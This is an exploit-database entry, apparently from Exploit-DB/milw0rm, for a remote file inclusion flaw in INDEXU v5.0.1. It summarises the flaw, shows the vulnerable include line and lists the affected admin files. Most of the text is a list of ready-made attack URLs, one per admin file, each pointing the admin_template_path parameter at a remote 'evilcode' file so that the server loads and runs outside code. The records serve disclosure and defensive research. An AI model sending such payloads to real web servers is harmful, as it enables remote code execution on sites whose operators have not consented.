indexu remote file include

vendor:

INDEXU

by:

CrAsh_oVeR_rIdE

7,5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: INDEXU

Affected Version From: INDEXU v5.0.1

Affected Version To: INDEXU v5.0.1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

INDEXU v5.0.1 is vulnerable to remote file inclusion due to the vulnerable code include($admin_template_path."msg.php"); which allows an attacker to include a remote file on the web server. The vulnerable files in the admin folder are app_change_email.php,app_change_pwd.php,app_mod_rewrite.php,app_page_caching.php,app_setup.php,cat_add.php,cat_delete.php,cat_edit.php,cat_path_update.php,cat_search.php,cat_struc.php,cat_view.php,cat_view_hidden.php,cat_view_hierarchy.php,cat_view_registered_only.php,checkurl_web.php,db_alter.php,db_backup.php,db_alter_change.php,db_export.php,editor_add.php,db_import.php,editor_delete.php,editor_validate.php,head.php,inv_config.php,inv_create.php,inv_delete.php,inv_edit.php,inv_config_payment.php,inv_markpaid.php,inv_markunpaid.php,inv_overdue.php,inv_paid.php,inv_send.php,inv_unpaid.php,index.php,lang_modify.php,link_add.php,link_bad.php,link_bad_delete.php,link_checkurl.php,link_delete.php,link_duplicate.php,link_edit.php,link_premium_listing.php,link_premium_sponsored.php,link_search.php,link_sponsored_listing.php,link_validate.php,link_validate_edit.php,link_view.php,log_search.php,mail_modify.php,menu.php,message_create.php,message_delete.php,message_edit.php,message_send.php,message_subscriber.php,message_view.php,review_validate.php,review_validate_edit.php,summary.php,template_delete.php,template_delete_file.php,template_duplicate.php,template_active.php,template_add_custom.php,template_export.php,template_import.php,template_manager.php,user_search.php,user_add.php,user_delete.php,user_edit.php,user_group_add.php,user_group_delete.php,user_group_edit.php,user_group_view.php,user_view.php

Mitigation:

Input validation should be done to prevent remote file inclusion. Also, the web server should be configured to disable the ability to execute scripts from the web root directory.

Source

Exploit-DB raw data:

indexu remote file include
-------------------------------------------------|
Discovered By CrAsh_oVeR_rIdE     |
Arabian Security Team                  |
-------------------------------------------------|
site of script:http://www.nicecoder.com/
-------------------------------------------------
Vulnerable: INDEXU v5.0.1
--------------------------------------------------
vulnerable code:
----------------------
include($admin_template_path."msg.php");
admin_template_path parameter File inclusion
-----------------------------------------------------------------------------------------------------------------------------------------
vulnerable files in admin folder:
-----------------------------------------
app_change_email.php,app_change_pwd.php,app_mod_rewrite.php,app_page_caching.php,app_setup.php,cat_add.php,cat_delete.php
,cat_edit.php,cat_path_update.php,cat_search.php,cat_struc.php,cat_view.php,cat_view_hidden.php,cat_view_hierarchy.php
,cat_view_registered_only.php,checkurl_web.php,db_alter.php,db_backup.php,db_alter_change.php,db_export.php,editor_add.php
,db_import.php,editor_delete.php,editor_validate.php,head.php,inv_config.php,inv_create.php,inv_delete.php,inv_edit.php
,inv_config_payment.php,inv_markpaid.php,inv_markunpaid.php,inv_overdue.php,inv_paid.php,inv_send.php,inv_unpaid.php
,index.php,lang_modify.php,link_add.php,link_bad.php,link_bad_delete.php,link_checkurl.php,link_delete.php,link_duplicate.php
,link_edit.php,link_premium_listing.php,link_premium_sponsored.php,link_search.php,link_sponsored_listing.php
,link_validate.php,link_validate_edit.php,link_view.php,log_search.php,mail_modify.php,menu.php,message_create.php
,message_delete.php,message_edit.php,message_send.php,message_subscriber.php,message_view.php,review_validate.php
,review_validate_edit.php,summary.php,template_delete.php,template_delete_file.php,template_duplicate.php
,template_active.php,template_add_custom.php,template_export.php,template_import.php,template_manager.php,user_search.php
,template_modify_file.php,template_rename.php,user_add.php,user_delete.php,user_edit.php,whos.php,template_modify.php
-------------------------------------------------
example:
http://example.com/indexu/admin/app_change_email.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/app_change_pwd.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/app_mod_rewrite.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/app_page_caching.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/app_setup.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/cat_add.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/cat_delete.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/cat_edit.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/cat_path_update.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/cat_search.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/cat_struc.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/cat_view.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/cat_view_hidden.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/cat_view_hierarchy.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/cat_view_registered_only.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/checkurl_web.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/db_alter.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/db_alter_change.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/db_backup.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/db_export.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/db_import.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/editor_add.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/editor_delete.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/editor_validate.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/head.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/index.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/inv_config.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/inv_config_payment.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/inv_create.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/inv_delete.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/inv_edit.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/inv_markpaid.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/inv_markunpaid.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/inv_overdue.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/inv_paid.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/inv_send.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/inv_unpaid.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/lang_modify.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/link_add.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/link_bad.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/link_bad_delete.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/link_checkurl.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/link_delete.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/link_duplicate.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/link_edit.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/link_premium_listing.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/link_premium_sponsored.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/link_search.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/link_sponsored_listing.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/link_validate.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/link_validate_edit.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/link_view.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/log_search.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/mail_modify.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/menu.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/message_create.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/message_delete.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/message_edit.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/message_send.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/message_subscriber.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/message_view.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/review_validate.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/review_validate_edit.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/summary.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/template_active.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/template_add_custom.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/template_delete.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/template_delete_file.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/template_duplicate.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/template_export.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/template_import.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/template_manager.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/template_modify.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/template_modify_file.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/template_rename.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/user_add.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/user_delete.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/user_edit.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/user_search.php?admin_template_path=http://evilcode.txt?
http://example.com/indexu/admin/whos.php?admin_template_path=http://evilcode.txt?
--------------------------------------------------
Discovered By CrAsh_oVeR_rIdE
E-mail:KARKOR23@hotmail.com
Site:www.lezr.com
Greetz:KING-HACKER,YOUNG
HACKER,SIMO,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3 AND ALL LEZR.COM Member

# milw0rm.com [2006-06-18]